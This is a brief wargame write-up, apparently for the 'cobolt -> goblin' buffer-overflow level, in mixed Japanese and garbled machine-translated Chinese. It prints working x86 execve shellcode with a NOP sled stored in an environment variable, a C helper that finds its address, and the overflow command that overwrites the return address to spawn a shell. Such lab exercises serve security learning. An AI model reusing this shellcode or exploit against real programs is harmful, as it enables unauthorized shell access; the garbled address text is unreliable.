cobolt -> goblin

1702 ワード

bof Japanese security テキストリンク

与cobolt只有入力方式不同
没有说明而攻击
制作环境变数

export SHL=`python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`

找阿德雷斯

#include <stdio.h>
#include <stdlib.h>

int main() {
    printf("%p\n", getenv("SHL"));
    return 0;
}

这次阿德雷斯是0 xbfffff 6 e
攻击コマンド

(python -c 'print "A"*20+"\x6e\xff\xff\xbf"'; cat) | ./goblin

クリア

この問題について(cobolt -> goblin), 我々は、より多くの情報をここで見つけました https://velog.io/@bin3635/cobolt-goblin

テキストは自由に共有またはコピーできます。ただし、このドキュメントのURLは参考URLとして残しておいてください。

Collection and Share based on the CC Protocol